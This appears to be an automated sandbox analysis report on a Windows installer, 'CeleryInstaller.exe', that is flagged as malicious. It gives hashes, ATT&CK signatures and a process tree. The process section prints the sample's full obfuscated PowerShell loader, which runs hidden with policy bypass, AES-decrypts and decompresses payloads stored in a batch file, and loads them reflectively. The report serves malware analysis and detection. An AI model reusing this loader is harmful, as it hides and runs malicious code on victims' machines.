Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 05:07
Static task
static1
Behavioral task
behavioral1
Sample
CeleryInstaller.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
CeleryInstaller.exe
Resource
win10v2004-20240802-en
General
-
Target
CeleryInstaller.exe
-
Size
822KB
-
MD5
5ce16788ba0245d5e0525600bc840303
-
SHA1
7a05b8b1f7d3e4a1ed2970ee264f8e30f7583fad
-
SHA256
a906de7e59caa3642f04482c23be09a43b17d4c90c3f2d2459dec6f9231e0785
-
SHA512
52154622f238f269ffc9dd129ba92741fc295db2cf0d11ccdbd022d05a6bbf3ddf4034897bc6223d837d9f9c9db2307165919d5a1f5cbf3d9f9d00daa4c123c6
-
SSDEEP
24576:6Zxdyl5wgQxPjs8kKMpoim6Gat+R3plhxZiXQu0Z:0Ul5wgQ9s8EpIa2xZn
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2748 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CeleryInstaller.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2416 wrote to memory of 2436 2416 CeleryInstaller.exe 31 PID 2436 wrote to memory of 2964 2436 cmd.exe 33 PID 2436 wrote to memory of 2964 2436 cmd.exe 33 PID 2436 wrote to memory of 2964 2436 cmd.exe 33 PID 2436 wrote to memory of 2964 2436 cmd.exe 33 PID 2964 wrote to memory of 2488 2964 net.exe 34 PID 2964 wrote to memory of 2488 2964 net.exe 34 PID 2964 wrote to memory of 2488 2964 net.exe 34 PID 2964 wrote to memory of 2488 2964 net.exe 34 PID 2436 wrote to memory of 2748 2436 cmd.exe 35 PID 2436 wrote to memory of 2748 2436 cmd.exe 35 PID 2436 wrote to memory of 2748 2436 cmd.exe 35 PID 2436 wrote to memory of 2748 2436 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe"C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\net.exenet file3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file4⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BBslLiALGpYFLEu1i/t4EBzRvVQklwJA4brDSg26+E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XK73PY4tKxp3jI+QruoY7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zhYIm=New-Object System.IO.MemoryStream(,$param_var); $JciOP=New-Object System.IO.MemoryStream; $ckzIi=New-Object System.IO.Compression.GZipStream($zhYIm, [IO.Compression.CompressionMode]::Decompress); $ckzIi.CopyTo($JciOP); $ckzIi.Dispose(); $zhYIm.Dispose(); $JciOP.Dispose(); $JciOP.ToArray();}function execute_function($param_var,$param2_var){ $epssR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qFpYd=$epssR.EntryPoint; $qFpYd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat';$bcFAm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat').Split([Environment]::NewLine);foreach ($qaSEs in $bcFAm) { if ($qaSEs.StartsWith(':: ')) { $BXfPO=$qaSEs.Substring(3); break; }}$payloads_var=[string[]]$BXfPO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
753KB
MD5b330aaa77de23287e51d97ebcf4d99db
SHA16e419af7daa1f0b3a16cc539a12914015f46da83
SHA256728be178f57a96a300b310b4cdbad650e9a4ce93834e2cbe8878c21d38589a9c
SHA5122d0e0f8949a39e9a03892cbc14698f68e264e85dd66f5d3f682c26c0cbbea4821a6ab88c487fa67c54f9a9ff47af5f7a7bce0197f2957349564680b9af783df5